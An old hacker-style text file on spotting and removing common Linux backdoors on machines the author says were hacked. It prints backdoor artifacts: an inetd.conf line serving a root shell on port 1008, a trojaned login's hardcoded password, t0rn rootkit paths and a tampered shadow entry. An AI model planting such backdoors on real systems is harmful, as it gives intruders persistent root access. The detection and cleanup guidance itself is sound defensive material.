Tips Removing BACKDOOR
Well Well let's me show you how to remove backdoor on
linux box. Let's See. Sometimes, we find that shells that we just hacked are
already hacked by some other hackers. Based on my observation, there's couple of
common backdoors that hackers use(applies to linux boxes). Here are some common
backdoors that hackers used.
/bin/login backdoor
sshd backdoor
/etc/passwd backdoor
Port backdoor
finger backdoor
/bin/login backdoor
To see whether your /bin/login is trojaned, try strings
/bin/login - you'll get /lib/ld-linux.so.2
__gmon_start__
libc.so.6
getenv
execve
perror
system
__deregister_frame_info
strcmp
exit
_IO_stdin_used
__libc_start_main
__register_frame_info
GLIBC_2.0
PTRh
DISPLAY
/bin/.login - This is where the original /bin/login is now located
l33tp4ss - This is the login backdoor password
/bin/sh
To remove /bin/login backdoor, do
rm /bin/login
mv <the moved original login> /bin/login
sshd backdoor
sshd backdoor, detecting and removing this backdoor is a bit technical.
Generally, sshd process runs at the background, thus when you do a ps aux, it
will be shown, unless ps is trojaned. On the issue whether ps is trojaned, i'll
write an article on detecting trojans soon. Another method of checking whether
there is an ssh backdoor, try tail -5 /etc/rc.d/rc.sysinit
# Now that we have all of our basic modules loaded and the kernel going,
# let's dump the syslog ring somewhere so we can find it later
dmesg > /var/log/dmesg
/usr/info/.t0rn/sharsed - This line runs the ssh backdoor into background
To remove the auto run process, remove the line /usr/info/.t0rn/sharsed
and
rm /usr/info/.t0rn/sharsed;killall -9 sharsed
/etc/passwd backdoor
Some hackers tend to change the account password of some programmes, such
as games and operator ,in order to gain local access. This backdoor can be
easily detected, do cat /etc/shadow
the original login in /etc/shadow will probably look like this
operator:*:11164:0:99999:7:::
games:*:11164:0:99999:7:::
while an backdoored will probably look like
operator:$1$Qv0h4mTr$0dKXLXYIy74LH93tCTayU1:11179:0:99999:7:-
1:-1:134537332
The difference is that the original login doesn't have an encrypted
password section.
To remove, just edit the account list /etc/passwd back to it's original
form
Port backdoor
Hackers might put port backdoors such as 1008 stream tcp nowait root /bin/sh
sh -i
in /etc/inetd.conf
To remove, just remove the line in /etc/inetd.conf and restart inetd by
/etc/rc.d/init.d/inet restart
finger backdoor
I've no idea how to detect this backdoor or removing it, sorry :)